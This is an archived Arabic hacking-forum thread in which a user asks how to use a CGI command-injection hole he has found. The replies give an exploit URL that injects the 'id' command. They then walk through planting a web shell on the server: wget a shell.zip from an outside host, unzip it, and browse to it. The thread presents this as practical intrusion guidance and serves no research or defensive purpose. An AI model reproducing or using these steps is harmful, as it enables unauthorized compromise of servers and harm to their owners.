مشاهدة النسخة كاملة : سؤال هام جدا جدا
adam30
11-12-2010, 01:05 AM
السلام عليكم
انا معى ثغرة cgi
و هى من الثغرات التى عبارة عن تطبيق اوامر اللينكس على المتصفح و لكن المشكلة اننى لا اعرف اى اوامر انفذها و لا الكيفية
Hidden pain
11-12-2010, 03:31 PM
تنفذ أوامر اللينكس في هذه الثغرات عن طريق وضع الأمر المراد تنفيذه في الاستغلال
مثلا هذا استغلال target.com/path/vuhunable.cgi?file=id
في هذا المثال طبقت الأمر id الذي يضهر صلاحياتنا على السرفر
أرجو أن أكون قد أفدت
The shadow
11-12-2010, 04:43 PM
بالنسبة لثغرات الsql هي كثيرة ولها اوامرها الخاصة تقدر تفوت قسم المواقع والسيرفرات وتلاقي دورات ودروس كثيرة من اخواني الأعضاء واذا عندك اي استفسار عنها انا جاهز
اما cgi فهي عبارة عن تطبيق اوامر على السيرفر مباشرة والأوامر هي اوامر لينكس وهي موجود في هذا الرابط
http://www.aljyyosh.com/shell.html
وكمثال الأخ Hidden pain (http://www.aljyyosh.com/vb/member.php?u=47165)
target.com/path/vuhunable.cgi?file=id
id هو امر معرفة صلاحيتك على السيرفر
اذا كنت تريد رفع شيل على السيرفر نستخدم امر السحب
wget
وبعدها رابط للشيل بشرط ان يكون مرفوع على موقع وبصيغة zip كمثال :
http//:www.xxx.com/shell.zip (http://www.xxx.com/shell.zip)
يعني يكون الأمر هكذا
wget
http//:www.xxx.com/shell.zip (http://www.xxx.com/shell.zip)
وبعدها نقوم بأظهار الملفات على المسار الي رفعنا فيه الشيل بأمر
ls
ونشوف اذا الشيل مرفوع او لا
وبعدها نفك ضغط الشيل بأمر
unzip
يعني يصبح الأمر هكذا
unzip shell.zip
ونشوف مسار الشيل ونتصفحه على المستعرض
والباقي كثير بس هاذ اهم شي
تحياتي
Powered by vBulletin® Version 4.2.6 by vBS Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.